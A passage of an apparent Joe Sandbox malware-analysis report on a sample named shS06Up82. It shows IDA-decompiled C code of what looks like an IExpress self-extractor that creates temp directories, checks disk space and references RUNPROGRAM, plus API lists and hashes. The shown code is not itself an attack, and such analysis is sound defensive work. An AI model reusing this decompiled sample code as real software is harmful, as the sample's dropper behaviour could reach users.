                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													do {
                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                      														_t44 = E003E597D(_t82, _t101, 1);
                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0x3e8b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E003E5467(0x3e8b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E003E44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E003E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x003e55ab
                                                                                                                                                                                                      0x003e55b2
                                                                                                                                                                                                      0x003e55c9
                                                                                                                                                                                                      0x003e55d5
                                                                                                                                                                                                      0x003e55d9
                                                                                                                                                                                                      0x003e5600
                                                                                                                                                                                                      0x003e5605
                                                                                                                                                                                                      0x003e560a
                                                                                                                                                                                                      0x003e560c
                                                                                                                                                                                                      0x003e5638
                                                                                                                                                                                                      0x003e5641
                                                                                                                                                                                                      0x003e5643
                                                                                                                                                                                                      0x003e5645
                                                                                                                                                                                                      0x003e5645
                                                                                                                                                                                                      0x003e564c
                                                                                                                                                                                                      0x003e5652
                                                                                                                                                                                                      0x003e5657
                                                                                                                                                                                                      0x003e5659
                                                                                                                                                                                                      0x003e5696
                                                                                                                                                                                                      0x003e569c
                                                                                                                                                                                                      0x003e589f
                                                                                                                                                                                                      0x003e58a7
                                                                                                                                                                                                      0x003e58ac
                                                                                                                                                                                                      0x003e58b3
                                                                                                                                                                                                      0x003e58b5
                                                                                                                                                                                                      0x003e56a2
                                                                                                                                                                                                      0x003e56a2
                                                                                                                                                                                                      0x003e56a8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56ae
                                                                                                                                                                                                      0x003e56ae
                                                                                                                                                                                                      0x003e56b9
                                                                                                                                                                                                      0x003e56bf
                                                                                                                                                                                                      0x003e56c1
                                                                                                                                                                                                      0x003e56f3
                                                                                                                                                                                                      0x003e56f3
                                                                                                                                                                                                      0x003e5705
                                                                                                                                                                                                      0x003e570a
                                                                                                                                                                                                      0x003e5711
                                                                                                                                                                                                      0x003e5717
                                                                                                                                                                                                      0x003e5724
                                                                                                                                                                                                      0x003e5726
                                                                                                                                                                                                      0x003e5729
                                                                                                                                                                                                      0x003e5730
                                                                                                                                                                                                      0x003e5737
                                                                                                                                                                                                      0x003e573d
                                                                                                                                                                                                      0x003e5740
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e572b
                                                                                                                                                                                                      0x003e572b
                                                                                                                                                                                                      0x003e572e
                                                                                                                                                                                                      0x003e5742
                                                                                                                                                                                                      0x003e5742
                                                                                                                                                                                                      0x003e5745
                                                                                                                                                                                                      0x003e576b
                                                                                                                                                                                                      0x003e576b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5747
                                                                                                                                                                                                      0x003e5747
                                                                                                                                                                                                      0x003e574d
                                                                                                                                                                                                      0x003e574f
                                                                                                                                                                                                      0x003e5771
                                                                                                                                                                                                      0x003e5771
                                                                                                                                                                                                      0x003e5773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5751
                                                                                                                                                                                                      0x003e5751
                                                                                                                                                                                                      0x003e5753
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5755
                                                                                                                                                                                                      0x003e575b
                                                                                                                                                                                                      0x003e5760
                                                                                                                                                                                                      0x003e5762
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5764
                                                                                                                                                                                                      0x003e5764
                                                                                                                                                                                                      0x003e5769
                                                                                                                                                                                                      0x003e577e
                                                                                                                                                                                                      0x003e577e
                                                                                                                                                                                                      0x003e5781
                                                                                                                                                                                                      0x003e5788
                                                                                                                                                                                                      0x003e578d
                                                                                                                                                                                                      0x003e578f
                                                                                                                                                                                                      0x003e57b2
                                                                                                                                                                                                      0x003e57b8
                                                                                                                                                                                                      0x003e57bd
                                                                                                                                                                                                      0x003e57bf
                                                                                                                                                                                                      0x003e57cd
                                                                                                                                                                                                      0x003e57cd
                                                                                                                                                                                                      0x003e57dd
                                                                                                                                                                                                      0x003e57e3
                                                                                                                                                                                                      0x003e57ef
                                                                                                                                                                                                      0x003e57f5
                                                                                                                                                                                                      0x003e57f8
                                                                                                                                                                                                      0x003e580a
                                                                                                                                                                                                      0x003e580a
                                                                                                                                                                                                      0x003e57fa
                                                                                                                                                                                                      0x003e5802
                                                                                                                                                                                                      0x003e5802
                                                                                                                                                                                                      0x003e580d
                                                                                                                                                                                                      0x003e580f
                                                                                                                                                                                                      0x003e5830
                                                                                                                                                                                                      0x003e5836
                                                                                                                                                                                                      0x003e583d
                                                                                                                                                                                                      0x003e584b
                                                                                                                                                                                                      0x003e5851
                                                                                                                                                                                                      0x003e5855
                                                                                                                                                                                                      0x003e585a
                                                                                                                                                                                                      0x003e585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e585e
                                                                                                                                                                                                      0x003e585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e585e
                                                                                                                                                                                                      0x003e5811
                                                                                                                                                                                                      0x003e5817
                                                                                                                                                                                                      0x003e5819
                                                                                                                                                                                                      0x003e581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e581f
                                                                                                                                                                                                      0x003e5791
                                                                                                                                                                                                      0x003e5797
                                                                                                                                                                                                      0x003e579c
                                                                                                                                                                                                      0x003e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e57a0
                                                                                                                                                                                                      0x003e57a9
                                                                                                                                                                                                      0x003e57ae
                                                                                                                                                                                                      0x003e57b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e57b0
                                                                                                                                                                                                      0x003e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5769
                                                                                                                                                                                                      0x003e5762
                                                                                                                                                                                                      0x003e5753
                                                                                                                                                                                                      0x003e574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5864
                                                                                                                                                                                                      0x003e5864
                                                                                                                                                                                                      0x003e5864
                                                                                                                                                                                                      0x003e5717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56c3
                                                                                                                                                                                                      0x003e56c5
                                                                                                                                                                                                      0x003e56c9
                                                                                                                                                                                                      0x003e56ce
                                                                                                                                                                                                      0x003e56d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56d6
                                                                                                                                                                                                      0x003e56d6
                                                                                                                                                                                                      0x003e56d8
                                                                                                                                                                                                      0x003e56dd
                                                                                                                                                                                                      0x003e56df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56e1
                                                                                                                                                                                                      0x003e56e2
                                                                                                                                                                                                      0x003e56e4
                                                                                                                                                                                                      0x003e56e6
                                                                                                                                                                                                      0x003e56eb
                                                                                                                                                                                                      0x003e56ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56f3
                                                                                                                                                                                                      0x003e56f3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e586c
                                                                                                                                                                                                      0x003e5878
                                                                                                                                                                                                      0x003e587e
                                                                                                                                                                                                      0x003e5882
                                                                                                                                                                                                      0x003e5883
                                                                                                                                                                                                      0x003e5889
                                                                                                                                                                                                      0x003e588e
                                                                                                                                                                                                      0x003e588e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5896
                                                                                                                                                                                                      0x003e56ed
                                                                                                                                                                                                      0x003e56df
                                                                                                                                                                                                      0x003e56d0
                                                                                                                                                                                                      0x003e56c1
                                                                                                                                                                                                      0x003e56a8
                                                                                                                                                                                                      0x003e565b
                                                                                                                                                                                                      0x003e565b
                                                                                                                                                                                                      0x003e565d
                                                                                                                                                                                                      0x003e5669
                                                                                                                                                                                                      0x003e5669
                                                                                                                                                                                                      0x003e565f
                                                                                                                                                                                                      0x003e565f
                                                                                                                                                                                                      0x003e5665
                                                                                                                                                                                                      0x003e5667
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5667
                                                                                                                                                                                                      0x003e566c
                                                                                                                                                                                                      0x003e5673
                                                                                                                                                                                                      0x003e5678
                                                                                                                                                                                                      0x003e567a
                                                                                                                                                                                                      0x003e589b
                                                                                                                                                                                                      0x003e589b
                                                                                                                                                                                                      0x003e5680
                                                                                                                                                                                                      0x003e5685
                                                                                                                                                                                                      0x003e568c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e568c
                                                                                                                                                                                                      0x003e567a
                                                                                                                                                                                                      0x003e560e
                                                                                                                                                                                                      0x003e5613
                                                                                                                                                                                                      0x003e561a
                                                                                                                                                                                                      0x003e5620
                                                                                                                                                                                                      0x003e5626
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5626
                                                                                                                                                                                                      0x003e55db
                                                                                                                                                                                                      0x003e55e0
                                                                                                                                                                                                      0x003e55e7
                                                                                                                                                                                                      0x003e55f1
                                                                                                                                                                                                      0x003e55f6
                                                                                                                                                                                                      0x003e55f6
                                                                                                                                                                                                      0x003e55f6
                                                                                                                                                                                                      0x003e58b7
                                                                                                                                                                                                      0x003e58c7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003E55CF
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 003E5638
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 003E564C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003E5620
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E56B9
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 003E571E
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 003E5737
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003E57CD
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003E57EF
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 003E5802
                                                                                                                                                                                                        • Part of subcall function 003E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 003E2654
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 003E5830
                                                                                                                                                                                                        • Part of subcall function 003E6517: FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                        • Part of subcall function 003E6517: LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                        • Part of subcall function 003E6517: DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                        • Part of subcall function 003E6517: FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 003E5878
                                                                                                                                                                                                        • Part of subcall function 003E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003E59A8
                                                                                                                                                                                                        • Part of subcall function 003E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003E59AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-3498133043
                                                                                                                                                                                                      • Opcode ID: 31ba10ddf8f543cec88bed9e4a5ccca4f1e4029171f102482213c1bcc37bf32e
                                                                                                                                                                                                      • Instruction ID: 0c020db2d88280737701a8471d4d5b1b2b62958cdb55b86c6960862645f0710a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31ba10ddf8f543cec88bed9e4a5ccca4f1e4029171f102482213c1bcc37bf32e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2812C70B04AF89ADB33AB338C85BEE765D9B65348F010365F586DA1D1DFB09EC18A50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 324 3e597d-3e59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3e59dd-3e5a1b GetDiskFreeSpaceA 324->325 326 3e59bb-3e59d8 call 3e44b9 call 3e6285 324->326 327 3e5ba1-3e5bde memset call 3e6285 GetLastError FormatMessageA 325->327 328 3e5a21-3e5a4a MulDiv 325->328 341 3e5c05-3e5c14 call 3e6ce0 326->341 338 3e5be3-3e5bfc call 3e44b9 SetCurrentDirectoryA 327->338 328->327 331 3e5a50-3e5a6c GetVolumeInformationA 328->331 334 3e5a6e-3e5ab0 memset call 3e6285 GetLastError FormatMessageA 331->334 335 3e5ab5-3e5aca SetCurrentDirectoryA 331->335 334->338 340 3e5acc-3e5ad1 335->340 351 3e5c02 338->351 344 3e5ae2-3e5ae4 340->344 345 3e5ad3-3e5ad8 340->345 349 3e5ae6 344->349 350 3e5ae7-3e5af8 344->350 345->344 347 3e5ada-3e5ae0 345->347 347->340 347->344 349->350 353 3e5af9-3e5afb 350->353 354 3e5c04 351->354 355 3e5afd-3e5b03 353->355 356 3e5b05-3e5b08 353->356 354->341 355->353 355->356 357 3e5b0a-3e5b1b call 3e44b9 356->357 358 3e5b20-3e5b27 356->358 357->351 360 3e5b29-3e5b33 358->360 361 3e5b52-3e5b5b 358->361 360->361 363 3e5b35-3e5b50 360->363 364 3e5b62-3e5b6d 361->364 363->364 365 3e5b6f-3e5b74 364->365 366 3e5b76-3e5b7d 364->366 367 3e5b85 365->367 368 3e5b7f-3e5b81 366->368 369 3e5b83 366->369 370 3e5b96-3e5b9f 367->370 371 3e5b87-3e5b94 call 3e268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E003E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                      				_t46 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                      				_t118 = __ecx;
                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      						 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						E003E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						L32:
                                                                                                                                                                                                      						_pop(_t114);
                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t69 = _v792 * _v796;
                                                                                                                                                                                                      					_v812 = _t69;
                                                                                                                                                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                      					__eflags = _t116;
                                                                                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                                                                                      						goto L29;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                      					__eflags = _t73;
                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                      						_t101 =  &_v16;
                                                                                                                                                                                                      						_t111 = 6;
                                                                                                                                                                                                      						_t119 = _t118 - _t101;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                                                                      							if(_t22 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t101 = _t87;
                                                                                                                                                                                                      							_t101 = _t101 + 1;
                                                                                                                                                                                                      							_t111 = _t111 - 1;
                                                                                                                                                                                                      							__eflags = _t111;
                                                                                                                                                                                                      							if(_t111 != 0) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t111;
                                                                                                                                                                                                      						if(_t111 == 0) {
                                                                                                                                                                                                      							_t101 = _t101 - 1;
                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t101 = 0;
                                                                                                                                                                                                      						_t112 = 0x200;
                                                                                                                                                                                                      						_t102 = _v812;
                                                                                                                                                                                                      						_t78 = 0;
                                                                                                                                                                                                      						_t118 = 8;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							__eflags = _t102 - _t112;
                                                                                                                                                                                                      							if(_t102 == _t112) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t112 = _t112 + _t112;
                                                                                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                                                                                      							__eflags = _t78 - _t118;
                                                                                                                                                                                                      							if(_t78 < _t118) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t78 - _t118;
                                                                                                                                                                                                      						if(_t78 != _t118) {
                                                                                                                                                                                                      							__eflags =  *0x3e9a34 & 0x00000008;
                                                                                                                                                                                                      							if(( *0x3e9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                      								L20:
                                                                                                                                                                                                      								_t103 =  *0x3e9a38; // 0x0
                                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(0x3e89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                      									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                      										__eflags = _t103 - _t116;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags = _t110 - _t116;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									 *0x3e9124 = 0;
                                                                                                                                                                                                      									_t66 = 1;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t66 = E003E268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t105 =  *0x3e9a38; // 0x0
                                                                                                                                                                                                      							_t110 =  *((intOrPtr*)(0x3e89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3e89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      							_t103 = (_t105 >> 2) +  *0x3e9a38;
                                                                                                                                                                                                      							goto L21;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t110 = 0x4c5;
                                                                                                                                                                                                      						E003E44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						goto L31;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      					_t110 = 0x4f9;
                                                                                                                                                                                                      					goto L30;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t110 = 0x4bc;
                                                                                                                                                                                                      					E003E44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					_t66 = 0;
                                                                                                                                                                                                      					L33:
                                                                                                                                                                                                      					return E003E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x003e597d
                                                                                                                                                                                                      0x003e5988
                                                                                                                                                                                                      0x003e598f
                                                                                                                                                                                                      0x003e599a
                                                                                                                                                                                                      0x003e59a6
                                                                                                                                                                                                      0x003e59a8
                                                                                                                                                                                                      0x003e59af
                                                                                                                                                                                                      0x003e59b9
                                                                                                                                                                                                      0x003e59dd
                                                                                                                                                                                                      0x003e59e4
                                                                                                                                                                                                      0x003e59f1
                                                                                                                                                                                                      0x003e59fe
                                                                                                                                                                                                      0x003e5a0b
                                                                                                                                                                                                      0x003e5a13
                                                                                                                                                                                                      0x003e5a19
                                                                                                                                                                                                      0x003e5a1b
                                                                                                                                                                                                      0x003e5ba1
